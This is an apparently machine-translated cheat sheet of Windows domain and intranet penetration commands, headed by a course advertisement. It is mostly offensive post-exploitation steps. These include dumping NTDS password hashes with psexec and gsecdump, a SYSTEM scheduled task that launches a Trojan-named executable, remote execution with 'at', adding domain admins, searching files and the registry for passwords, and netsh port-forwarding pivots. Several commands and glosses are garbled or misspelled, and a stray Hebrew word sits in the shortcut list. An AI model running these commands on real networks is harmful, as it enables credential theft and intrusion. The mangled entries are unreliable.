Up-to-date cyber security course syllabus
If you are interested, please leave a message
1. Common domain operation commands:
net group /domain
Get a list of all domain user groups
net group qq_group /domain
Displays the members of qq_group groups in the domain
net group qq_group /del /domain
Delete qq_group group in the domain
net group qq_group qq /del /domain
Delete the QQs of the members of the qq_group group in the domain
net group qq_group /add /domain
Add groups in the domain
net group "domain admins" /domain
Get a list of domain administrators
net group "enterprise admins" /domain
Get a list of enterprise administrators
net localgroup administrators /domain
//获取域内置administrators组用(enterprise admins、domain admins)
net group "domain controllers" /domain
Get a list of domain controllers
net group "domain computers" /domain
Get a list of all domain member computers
net user /domain
Get a list of all domain users
net user someuser /domain
Get the details of the specified account someuser
net accounts /domain
Get information such as domain password policy settings, password lengths, incorrect lockouts, and more
nei view /domain
Query several domains, query the list of domains
net view /domain:testdomain
View the list of computers in the testdomain domain
nltest /domain_trusts
Obtain domain trust information
net user domain-admin /domain
Check the login time, password expiration time, login scripts, group assignments, and other information
net config Workstation
Query which domain the machine belongs to
net time /domian
The time when the primary domain server was queried
echo %logonserver%
Look at the name of the computer that is logged in to this server
net time \\192.168.1.1
Query the time of the remote shared host 192.168.1.1
net use \\IP\ipc$ password /user:username@domain
ipc$ intra-domain connection
net view \\dc2.backlion.com
View domain-controlled sharing
dir \\dc2.backlion.com\SYSVOL /s/a > sysvol.txt
Lists the sysvol logging
xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt /i /c
Remotely copy sysvol logs to the local computer
net user /domain bk bk123
To change the password of a user in a domain, you need to have administrator permissions
net localgroup administartors SEZKL\backlion /add
Add the user backlion in the SEZKL domain to the administrators group
mstsc /admin
Log in to the console session on the remote desktop to solve the problem that the hash cannot be captured
gpupdate/force
Update the domain policy
psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u
Export the hash value from the domain server password storage file windows/ntds/ntds.dit
gsecdump -a
Get the hash value of the domain login administrator, here gescdump exports the hash value of the AD domain for the third party
tasklist /S ip /U domain\username /P /V
View the Remote Computer Processes column
2. Basic Intranet Infiltration Commands:
ipconfig/all
Check the IP address
ipconfig /release
Release address
ipconfig /renew
Reobtain the IP address
whoami
Query the permissions of the account
whoami/all
Check the SID value
systeminfo
Query system and patch information
tasklist /svc
View the process
taskkill /im 进程名称(cmd)
End the process
taskkill /pid[process code] -t (end the process) -f (force end the process and all child processes)
wmic qfe get hotfixid
It's useful to see which patches have been installed
wmic qfe list full /format:htable > hotfixes.htm
Detailed patch installation
wmic qfe
Query the patch information and the download address provided by Microsoft
ping hostname(主机名)
Displays the IP address of the machine name
net start
View the services that are currently running
net user
View users for the local group
net localhroup administrators
See which users are in the native Administrators group
net user
View the session
net session
View the current session
net share
Look at the path that the SMB points to [i.e. shared]
wmic share get name,path
Check the path that the SMB points to
wmic nteventlog get path,filename,writeable
Query the storage location of system log files
net use \\IP\ipc$ password /user:username
Establishing an IPC Session (Workgroup Mode)
net use z: \\192.168.1.1
Establish a mapping to the local Z drive
net time \\172.16.16.2
Query shared hosting is:
at \\172.16.16.2 13:50 c:\windows\2009.exe
Performed on shared hosting
netstat -ano
Look at the open ports
netstat -an | find “3389”
Port 3389 was found
net accounts
Review the local password policy
nbtstat –A ip
netbiso query
net view
Looking at the machine annotation may give you a list of currently active machines, but you can't see it if you disable NetBIOS
echo %PROCESSOR_ARCHITECTURE%
Check if the system is 32 or 64 bits
set
View the system environment setting variables
net start
View the services that are currently running
wmic service list brief
View Process Services
wmic process list brief
View the process
wmic startup list brief
View the startup program information
wmic product list brief
View installer and version information (exploit clues)
wmic startup list full
Identify the program that starts at boot
qwinsta
Check your sign-in
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7
Add a scheduled task
REG query HKCU /v "pwd" /s
Get the password saved to the registry
3. Common commands for intranet network junctions:
tracert IP
Traceroute
route print
Print the routing table
ARP -A
Lists all active IP addresses in the CIDR block
Arp-S (App + Mac)
Bind the MAC address to the IP address
Arp-D (App + Mac)
Unbind the MAC address from the IP address
nbtscan -r 192.168.16.0/24
Scan the entire network via the gadget nbtscan
netsh firewall show config
Review the firewall policy
netsh firewall show state
Review the firewall policy
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl"
Scan the surviving hosts on the intranet in batches
Windows comes with port forwarding:
netsh——interface——ipv6 install
Install IPV6 first (IPV6 must be installed under xp and 2003, otherwise port forwarding is unavailable!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22
Place native 22 to 22 of 1.1.1.1
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22
netsh interface portproxy show all
View the forwarding configuration
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22
Delete the configuration
netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all
Add a firewall rule to allow connections22:
4. Sensitive Data and Catalogs:
dir /b/s config.*
View all files prefixed with config. in the directory
findstr /si password *.xml *.ini *.txt
View the files in the suffix file that contain the password keyword
findstr /si login *.xml *.ini *.txt
View files in the suffix file that contain the login keyword
copy con 创建命令:
copy with ftp.bat
Create a ftp.bat batch, then enter a command such as ifconfig, press CTR+Z to exit, and the creation is successful
copy with test.vbs
Create a test.vbs script, enter the script, press CTR+Z to exit, and the script is created successfully
5.dsquery AD Query Tool:
dsquery user domainroot -limit 65535 && net user /domain
Lists all usernames in the domain
dsquery server -domain super.com | dsget server -dnsname -site
Search all domain controllers within the domain and display their DNS hostnames and site names
dsquery contact
Look for a contact in your directory
dsquery subnet
Lists the CIDR block divisions within the domain
query user
Query which users are online
dsquery group && net group /domain
Lists the groupings within the domain
dsquery or
Lists the organizational units within the domain
dsquery server && net time /domain
Lists the domain controllers within the domain
Discurry Site - O RDN
Search for the names of all sites in the domain
dsquery group dc=super,dc=com |more
Search for all groups in the DC=SUPER, DC=COM domains
psloggedon.exe
Query which host and user are logged in to the host
netsess.exe //192.168.1.115
The remote host does not require administrator privileges, and the host name and user can be queried
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT"
Get the record of the most recent MSTSC login
6. DOS common shortcut commands
mspaint paint tool
Calc Calculator
Notepad Notepad
Taskmgr Task Manager
OSK opens the on-screen keyboard
gpedit.msc יהוה
services.msc local services
compmgmt.msc computer management
devmgmt.msc Device Manager
winver to see the system version
Magnify Magnify Utility
eventvwr Event Viewer
Regedit opens the registry
resmon Resource Monitor
WMIC BIOS get releasedate 查看电脑生产日期
mstsc -f remote connection (full screen is possible)